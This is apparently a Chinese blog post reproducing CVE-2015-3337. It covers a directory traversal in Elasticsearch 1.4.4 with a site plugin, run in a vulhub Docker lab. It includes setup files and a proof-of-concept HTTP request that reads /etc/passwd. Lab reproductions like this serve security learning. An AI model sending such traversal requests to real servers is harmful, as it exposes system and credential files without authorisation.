【漏洞复现】CVE-2015-3337 Arbitrary File Reading

漏洞信息

NVD - CVE-2015-3337

Directory traversal vulnerability in Elasticsearch before 1.4.5 and 1.5.x before 1.5.2, when a site plugin is enabled, allows remote attackers to read arbitrary files via unspecified vectors.

在安装了具有"site"功能的插件以后,插件目录使用.../即可向上跳转,导致目录穿越漏洞,可读取任意文件。没有安装任意插件的elasticsearch不受影响。

背景介绍

Elasticsearch is an open source distributed, RESTful search and analytics engine, scalable data store, and vector database capable of addressing a growing number of use cases. As the heart of the Elastic Stack, it centrally stores your data for lightning-fast search, fine‑tuned relevancy, and powerful analytics that scale with ease.

主页:https://www.elastic.co/elasticsearch

源码:https://github.com/elastic/elasticsearch

环境搭建

Dockerfile

dockerfile 复制代码
FROM vulhub/elasticsearch:1.4.4

LABEL maintainer="phithon <root@leavesongs.com>"

RUN set -ex \
    && plugin -install mobz/elasticsearch-head

docker-compose.yaml

yaml 复制代码
version: '2'
services:
 es:
   build: .
   ports:
    - "9200:9200"
    - "9300:9300"

使用Docker Compose构建和启动环境:

sh 复制代码
$ docker-compose up -d

Debug:

sh 复制代码
ERROR: for es  'ContainerConfig'
Traceback (most recent call last):
  File "bin/docker-compose", line 3, in <module>
  File "compose/cli/main.py", line 67, in main
  File "compose/cli/main.py", line 126, in perform_command
  File "compose/cli/main.py", line 1070, in up
  File "compose/cli/main.py", line 1066, in up
  File "compose/project.py", line 648, in up
  File "compose/parallel.py", line 108, in parallel_execute
  File "compose/parallel.py", line 206, in producer
  File "compose/project.py", line 634, in do
  File "compose/service.py", line 579, in execute_convergence_plan
  File "compose/service.py", line 501, in _execute_convergence_recreate
  File "compose/parallel.py", line 108, in parallel_execute
  File "compose/parallel.py", line 206, in producer
  File "compose/service.py", line 494, in recreate
  File "compose/service.py", line 613, in recreate_container
  File "compose/service.py", line 332, in create_container
  File "compose/service.py", line 917, in _get_container_create_options
  File "compose/service.py", line 957, in _build_container_volume_options
  File "compose/service.py", line 1532, in merge_volume_bindings
  File "compose/service.py", line 1562, in get_container_data_volumes
KeyError: 'ContainerConfig'
[5518] Failed to execute script docker-compose

# down --volumes 会停止并删除所有容器和关联的卷
# --remove-orphans 会清除任何不再在 docker-compose.yml 文件中定义的孤立容器
$ docker-compose down --volumes --remove-orphans
$ docker-compose up -d --build

漏洞复现

参考:https://github.com/vulhub/vulhub/tree/master/elasticsearch/CVE-2015-3337

测试环境默认安装了一个插件:elasticsearch-head,head插件提供了Elasticsearch的前端页面,访问http://127.0.0.1:9200/_plugin/head/即可看到:

但是这就无意间带来了问题------目录越级遍历,漏洞利用和原理都很简单,直接访问http://127.0.0.1:9200/plugin/head/.../.../.../.../.../.../.../.../.../etc/passwd即可:

POC:

http 复制代码
GET /_plugin/head/../../../../../../../../../etc/passwd HTTP/1.1
Host: 127.0.0.1:9200
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Upgrade-Insecure-Requests: 1
相关推荐
2301_780303903 小时前
网络安全、自动化运维、ERP、CRM、MES
运维·web安全·网络安全·自动化·安全威胁分析
阿里云大数据AI技术4 小时前
Elasticsearch 智能助手:Agent 让运维从经验驱动迈向智能协同
人工智能·elasticsearch·agent
极客先躯4 小时前
高级java每日一道面试题-2026年03月30日-实战篇[Docker]-如何监控容器的网络流量?
java·运维·docker·容器·prometheus·高级面试
学逆向的4 小时前
汇编——内存
开发语言·汇编·算法·网络安全
大E帝国子民16 小时前
Docker 部署 RocketMQ 5
docker·容器·rocketmq
江湖有缘7 小时前
【保姆级教程】使用Docker Compose一键搭建Picsur私有图床服务
java·docker·容器
学逆向的9 小时前
汇编——位运算
开发语言·汇编·算法·网络安全
java_logo10 小时前
5 分钟共享打印机:用 Docker 一键部署 CUPS
运维·docker·容器·cups·网络打印机·共享打印机·docker部署cups
fen_fen10 小时前
Docker部署PostgreSQL10 开启SSL和证书安装文档
docker·容器·ssl
数据知道10 小时前
安全报告怎么写才专业:渗透测试报告模板与踩坑
安全·网络安全·漏洞修复·安全报告·渗透测试报告